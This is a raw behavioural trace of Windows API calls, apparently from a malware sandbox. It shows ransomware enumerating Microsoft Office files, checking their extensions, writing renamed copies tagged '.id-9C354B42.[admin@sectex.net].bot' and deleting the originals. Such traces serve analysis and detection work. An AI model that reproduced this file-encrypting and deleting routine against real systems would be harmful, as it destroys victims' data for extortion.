	[0155.938] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\otkloadr_x64.dll" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\otkloadr_x64.dll")) returned 0x20
	[0155.938] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\otkloadr_x64.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\otkloadr_x64.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0155.938] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\otkloadr_x64.dll" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\otkloadr_x64.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0155.938] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\otkloadr_x64.dll") returned 66
	[0155.938] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\otkloadr_x64.dll") returned 66
	[0155.938] lstrlenW (lpString=".doc") returned 4
	[0155.938] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0155.938] lstrlenW (lpString=".docx") returned 5
	[0155.938] lstrcmpiW (lpString1=".docx", lpString2="4.dll") returned -1
	[0155.938] lstrlenW (lpString=".pdf") returned 4
	[0155.938] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0155.938] lstrlenW (lpString=".xls") returned 4
	[0155.938] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0155.939] lstrlenW (lpString=".xlsx") returned 5
	[0155.939] lstrcmpiW (lpString1=".xlsx", lpString2="4.dll") returned -1
	[0155.939] lstrlenW (lpString=".ppt") returned 4
	[0155.939] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0155.939] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\otkloadr_x64.dll") returned 66
	[0155.939] lstrlenW (lpString=".zip") returned 4
	[0155.939] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0155.939] lstrlenW (lpString=".rar") returned 4
	[0155.939] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0155.939] lstrlenW (lpString=".bz2") returned 4
	[0155.939] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0155.939] lstrlenW (lpString=".7z") returned 3
	[0155.939] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0155.939] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\otkloadr_x64.dll") returned 66
	[0155.939] lstrlenW (lpString=".dbf") returned 4
	[0155.939] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0155.939] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\otkloadr_x64.dll") returned 66
	[0155.939] lstrlenW (lpString=".1cd") returned 4
	[0155.939] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0155.939] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\otkloadr_x64.dll") returned 66
	[0155.939] lstrlenW (lpString=".jpg") returned 4
	[0155.939] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0155.939] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\otkloadr_x64.dll") returned 66
	[0155.939] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\otkloadr_x64.dll") returned 66
	[0155.939] lstrlenW (lpString=".doc") returned 4
	[0155.939] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0155.939] lstrlenW (lpString=".docx") returned 5
	[0155.939] lstrcmpiW (lpString1=".docx", lpString2="4.dll") returned -1
	[0155.939] lstrlenW (lpString=".pdf") returned 4
	[0155.939] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0155.940] lstrlenW (lpString=".xls") returned 4
	[0155.940] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0155.940] lstrlenW (lpString=".xlsx") returned 5
	[0155.940] lstrcmpiW (lpString1=".xlsx", lpString2="4.dll") returned -1
	[0155.940] lstrlenW (lpString=".ppt") returned 4
	[0155.940] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0155.940] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\otkloadr_x64.dll") returned 66
	[0155.940] lstrlenW (lpString=".zip") returned 4
	[0155.940] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0155.940] lstrlenW (lpString=".rar") returned 4
	[0155.940] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0155.940] lstrlenW (lpString=".bz2") returned 4
	[0155.940] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0155.940] lstrlenW (lpString=".7z") returned 3
	[0155.940] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0155.940] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\otkloadr_x64.dll") returned 66
	[0155.940] lstrlenW (lpString=".dbf") returned 4
	[0155.940] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0155.940] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\otkloadr_x64.dll") returned 66
	[0155.940] lstrlenW (lpString=".1cd") returned 4
	[0155.940] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0155.940] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\otkloadr_x64.dll") returned 66
	[0155.940] lstrlenW (lpString=".jpg") returned 4
	[0155.940] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0155.940] lstrcmpiW (lpString1=".ECF", lpString2=".bot") returned 1
	[0155.940] lstrlenW (lpString="OUTEX.ECF") returned 9
	[0155.940] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTEX.ECF" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\outex.ecf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0155.977] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=1926) returned 1
	[0155.977] CloseHandle (hObject=0x3a0) returned 1
	[0155.977] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTEX.ECF" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\outex.ecf")) returned 0x20
	[0155.977] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTEX.ECF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\outex.ecf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0155.977] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTEX.ECF" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\outex.ecf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0155.977] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.977] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.977] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTEX.ECF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\outex.ecf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0155.978] GetLastError () returned 0x0
	[0155.978] ReadFile (in: hFile=0x3a0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x786, lpOverlapped=0x0) returned 1
	[0156.055] WriteFile (in: hFile=0x25c, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x790, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x790, lpOverlapped=0x0) returned 1
	[0156.056] ReadFile (in: hFile=0x3a0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0156.056] WriteFile (in: hFile=0x25c, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0156.056] SetEndOfFile (hFile=0x25c) returned 1
	[0156.056] CloseHandle (hObject=0x25c) returned 1
	[0156.056] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.056] SetEndOfFile (hFile=0x3a0) returned 1
	[0156.061] CloseHandle (hObject=0x3a0) returned 1
	[0156.061] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTEX.ECF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0156.205] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTEX.ECF" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\outex.ecf")) returned 1
	[0156.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTEX.ECF") returned 59
	[0156.252] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTEX.ECF") returned 59
	[0156.252] lstrlenW (lpString=".doc") returned 4
	[0156.254] lstrcmpiW (lpString1=".doc", lpString2=".ECF") returned -1
	[0156.254] lstrlenW (lpString=".docx") returned 5
	[0156.265] lstrcmpiW (lpString1=".docx", lpString2="X.ECF") returned -1
	[0156.265] lstrlenW (lpString=".pdf") returned 4
	[0156.265] lstrcmpiW (lpString1=".pdf", lpString2=".ECF") returned 1
	[0156.265] lstrlenW (lpString=".xls") returned 4
	[0156.265] lstrcmpiW (lpString1=".xls", lpString2=".ECF") returned 1
	[0156.265] lstrlenW (lpString=".xlsx") returned 5
	[0156.265] lstrcmpiW (lpString1=".xlsx", lpString2="X.ECF") returned -1
	[0156.265] lstrlenW (lpString=".ppt") returned 4
	[0156.265] lstrcmpiW (lpString1=".ppt", lpString2=".ECF") returned 1
	[0156.265] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTEX.ECF") returned 59
	[0156.265] lstrlenW (lpString=".zip") returned 4
	[0156.265] lstrcmpiW (lpString1=".zip", lpString2=".ECF") returned 1
	[0156.265] lstrlenW (lpString=".rar") returned 4
	[0156.275] lstrcmpiW (lpString1=".rar", lpString2=".ECF") returned 1
	[0156.275] lstrlenW (lpString=".bz2") returned 4
	[0156.275] lstrcmpiW (lpString1=".bz2", lpString2=".ECF") returned -1
	[0156.275] lstrlenW (lpString=".7z") returned 3
	[0156.275] lstrcmpiW (lpString1=".7z", lpString2="ECF") returned -1
	[0156.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTEX.ECF") returned 59
	[0156.275] lstrlenW (lpString=".dbf") returned 4
	[0156.275] lstrcmpiW (lpString1=".dbf", lpString2=".ECF") returned -1
	[0156.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTEX.ECF") returned 59
	[0156.275] lstrlenW (lpString=".1cd") returned 4
	[0156.276] lstrcmpiW (lpString1=".1cd", lpString2=".ECF") returned -1
	[0156.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTEX.ECF") returned 59
	[0156.276] lstrlenW (lpString=".jpg") returned 4
	[0156.276] lstrcmpiW (lpString1=".jpg", lpString2=".ECF") returned 1
	[0156.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTEX.ECF") returned 59
	[0156.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTEX.ECF") returned 59
	[0156.276] lstrlenW (lpString=".doc") returned 4
	[0156.276] lstrcmpiW (lpString1=".doc", lpString2=".ECF") returned -1
	[0156.276] lstrlenW (lpString=".docx") returned 5
	[0156.276] lstrcmpiW (lpString1=".docx", lpString2="X.ECF") returned -1
	[0156.276] lstrlenW (lpString=".pdf") returned 4
	[0156.276] lstrcmpiW (lpString1=".pdf", lpString2=".ECF") returned 1
	[0156.276] lstrlenW (lpString=".xls") returned 4
	[0156.276] lstrcmpiW (lpString1=".xls", lpString2=".ECF") returned 1
	[0156.276] lstrlenW (lpString=".xlsx") returned 5
	[0156.276] lstrcmpiW (lpString1=".xlsx", lpString2="X.ECF") returned -1
	[0156.276] lstrlenW (lpString=".ppt") returned 4
	[0156.276] lstrcmpiW (lpString1=".ppt", lpString2=".ECF") returned 1
	[0156.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTEX.ECF") returned 59
	[0156.276] lstrlenW (lpString=".zip") returned 4
	[0156.276] lstrcmpiW (lpString1=".zip", lpString2=".ECF") returned 1
	[0156.276] lstrlenW (lpString=".rar") returned 4
	[0156.276] lstrcmpiW (lpString1=".rar", lpString2=".ECF") returned 1
	[0156.276] lstrlenW (lpString=".bz2") returned 4
	[0156.276] lstrcmpiW (lpString1=".bz2", lpString2=".ECF") returned -1
	[0156.276] lstrlenW (lpString=".7z") returned 3
	[0156.276] lstrcmpiW (lpString1=".7z", lpString2="ECF") returned -1
	[0156.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTEX.ECF") returned 59
	[0156.276] lstrlenW (lpString=".dbf") returned 4
	[0156.276] lstrcmpiW (lpString1=".dbf", lpString2=".ECF") returned -1
	[0156.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTEX.ECF") returned 59
	[0156.277] lstrlenW (lpString=".1cd") returned 4
	[0156.277] lstrcmpiW (lpString1=".1cd", lpString2=".ECF") returned -1
	[0156.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTEX.ECF") returned 59
	[0156.277] lstrlenW (lpString=".jpg") returned 4
	[0156.277] lstrcmpiW (lpString1=".jpg", lpString2=".ECF") returned 1
	[0156.277] lstrcmpiW (lpString1=".dll", lpString2=".bot") returned 1
	[0156.277] lstrlenW (lpString="BCSLaunch.dll") returned 13
	[0156.277] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BCSLaunch.dll" (normalized: "c:\\program files\\microsoft office\\office14\\bcslaunch.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0156.282] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=70528) returned 1
	[0156.282] CloseHandle (hObject=0x38c) returned 1
	[0156.282] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BCSLaunch.dll" (normalized: "c:\\program files\\microsoft office\\office14\\bcslaunch.dll")) returned 0x20
	[0156.317] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BCSLaunch.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\bcslaunch.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0156.331] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BCSLaunch.dll" (normalized: "c:\\program files\\microsoft office\\office14\\bcslaunch.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0156.331] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSLaunch.dll") returned 56
	[0156.331] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSLaunch.dll") returned 56
	[0156.331] lstrlenW (lpString=".doc") returned 4
	[0156.331] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0156.331] lstrlenW (lpString=".docx") returned 5
	[0156.331] lstrcmpiW (lpString1=".docx", lpString2="h.dll") returned -1
	[0156.331] lstrlenW (lpString=".pdf") returned 4
	[0156.331] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0156.331] lstrlenW (lpString=".xls") returned 4
	[0156.331] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0156.331] lstrlenW (lpString=".xlsx") returned 5
	[0156.331] lstrcmpiW (lpString1=".xlsx", lpString2="h.dll") returned -1
	[0156.331] lstrlenW (lpString=".ppt") returned 4
	[0156.331] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0156.331] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSLaunch.dll") returned 56
	[0156.331] lstrlenW (lpString=".zip") returned 4
	[0156.332] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0156.332] lstrlenW (lpString=".rar") returned 4
	[0156.332] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0156.332] lstrlenW (lpString=".bz2") returned 4
	[0156.332] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0156.332] lstrlenW (lpString=".7z") returned 3
	[0156.332] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0156.332] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSLaunch.dll") returned 56
	[0156.332] lstrlenW (lpString=".dbf") returned 4
	[0156.332] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0156.332] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSLaunch.dll") returned 56
	[0156.332] lstrlenW (lpString=".1cd") returned 4
	[0156.332] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0156.332] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSLaunch.dll") returned 56
	[0156.332] lstrlenW (lpString=".jpg") returned 4
	[0156.332] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0156.332] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSLaunch.dll") returned 56
	[0156.332] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSLaunch.dll") returned 56
	[0156.332] lstrlenW (lpString=".doc") returned 4
	[0156.332] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0156.332] lstrlenW (lpString=".docx") returned 5
	[0156.332] lstrcmpiW (lpString1=".docx", lpString2="h.dll") returned -1
	[0156.332] lstrlenW (lpString=".pdf") returned 4
	[0156.332] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0156.332] lstrlenW (lpString=".xls") returned 4
	[0156.332] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0156.332] lstrlenW (lpString=".xlsx") returned 5
	[0156.332] lstrcmpiW (lpString1=".xlsx", lpString2="h.dll") returned -1
	[0156.332] lstrlenW (lpString=".ppt") returned 4
	[0156.332] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0156.332] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSLaunch.dll") returned 56
	[0156.332] lstrlenW (lpString=".zip") returned 4
	[0156.333] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0156.333] lstrlenW (lpString=".rar") returned 4
	[0156.333] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0156.333] lstrlenW (lpString=".bz2") returned 4
	[0156.333] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0156.333] lstrlenW (lpString=".7z") returned 3
	[0156.333] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0156.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSLaunch.dll") returned 56
	[0156.333] lstrlenW (lpString=".dbf") returned 4
	[0156.333] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0156.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSLaunch.dll") returned 56
	[0156.333] lstrlenW (lpString=".1cd") returned 4
	[0156.333] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0156.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSLaunch.dll") returned 56
	[0156.333] lstrlenW (lpString=".jpg") returned 4
	[0156.333] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0156.333] lstrcmpiW (lpString1=".BDR", lpString2=".bot") returned -1
	[0156.333] lstrlenW (lpString="MSART10.BDR") returned 11
	[0156.333] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART10.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart10.bdr"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0156.334] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=9292) returned 1
	[0156.334] CloseHandle (hObject=0x3d4) returned 1
	[0156.334] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART10.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart10.bdr")) returned 0x20
	[0156.334] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART10.BDR.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart10.bdr.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0156.334] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART10.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart10.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0156.334] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.334] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.334] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART10.BDR.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart10.bdr.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0156.335] GetLastError () returned 0x0
	[0156.335] ReadFile (in: hFile=0x3d4, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x244c, lpOverlapped=0x0) returned 1
	[0156.383] WriteFile (in: hFile=0x3dc, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x2450, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x2450, lpOverlapped=0x0) returned 1
	[0156.384] ReadFile (in: hFile=0x3d4, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0156.385] WriteFile (in: hFile=0x3dc, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xea, lpOverlapped=0x0) returned 1
	[0156.385] SetEndOfFile (hFile=0x3dc) returned 1
	[0156.385] CloseHandle (hObject=0x3dc) returned 1
	[0156.385] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.385] SetEndOfFile (hFile=0x3d4) returned 1
	[0156.387] CloseHandle (hObject=0x3d4) returned 1
	[0156.387] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART10.BDR.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0156.387] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART10.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart10.bdr")) returned 1
	[0156.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART10.BDR") returned 62
	[0156.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART10.BDR") returned 62
	[0156.388] lstrlenW (lpString=".doc") returned 4
	[0156.388] lstrcmpiW (lpString1=".doc", lpString2=".BDR") returned 1
	[0156.388] lstrlenW (lpString=".docx") returned 5
	[0156.388] lstrcmpiW (lpString1=".docx", lpString2="0.BDR") returned -1
	[0156.388] lstrlenW (lpString=".pdf") returned 4
	[0156.388] lstrcmpiW (lpString1=".pdf", lpString2=".BDR") returned 1
	[0156.388] lstrlenW (lpString=".xls") returned 4
	[0156.388] lstrcmpiW (lpString1=".xls", lpString2=".BDR") returned 1
	[0156.388] lstrlenW (lpString=".xlsx") returned 5
	[0156.388] lstrcmpiW (lpString1=".xlsx", lpString2="0.BDR") returned -1
	[0156.388] lstrlenW (lpString=".ppt") returned 4
	[0156.388] lstrcmpiW (lpString1=".ppt", lpString2=".BDR") returned 1
	[0156.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART10.BDR") returned 62
	[0156.388] lstrlenW (lpString=".zip") returned 4
	[0156.388] lstrcmpiW (lpString1=".zip", lpString2=".BDR") returned 1
	[0156.389] lstrlenW (lpString=".rar") returned 4
	[0156.389] lstrcmpiW (lpString1=".rar", lpString2=".BDR") returned 1
	[0156.389] lstrlenW (lpString=".bz2") returned 4
	[0156.389] lstrcmpiW (lpString1=".bz2", lpString2=".BDR") returned 1
	[0156.389] lstrlenW (lpString=".7z") returned 3
	[0156.389] lstrcmpiW (lpString1=".7z", lpString2="BDR") returned -1
	[0156.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART10.BDR") returned 62
	[0156.389] lstrlenW (lpString=".dbf") returned 4
	[0156.389] lstrcmpiW (lpString1=".dbf", lpString2=".BDR") returned 1
	[0156.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART10.BDR") returned 62
	[0156.389] lstrlenW (lpString=".1cd") returned 4
	[0156.389] lstrcmpiW (lpString1=".1cd", lpString2=".BDR") returned -1
	[0156.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART10.BDR") returned 62
	[0156.389] lstrlenW (lpString=".jpg") returned 4
	[0156.389] lstrcmpiW (lpString1=".jpg", lpString2=".BDR") returned 1
	[0156.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART10.BDR") returned 62
	[0156.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART10.BDR") returned 62
	[0156.389] lstrlenW (lpString=".doc") returned 4
	[0156.389] lstrcmpiW (lpString1=".doc", lpString2=".BDR") returned 1
	[0156.389] lstrlenW (lpString=".docx") returned 5
	[0156.389] lstrcmpiW (lpString1=".docx", lpString2="0.BDR") returned -1
	[0156.389] lstrlenW (lpString=".pdf") returned 4
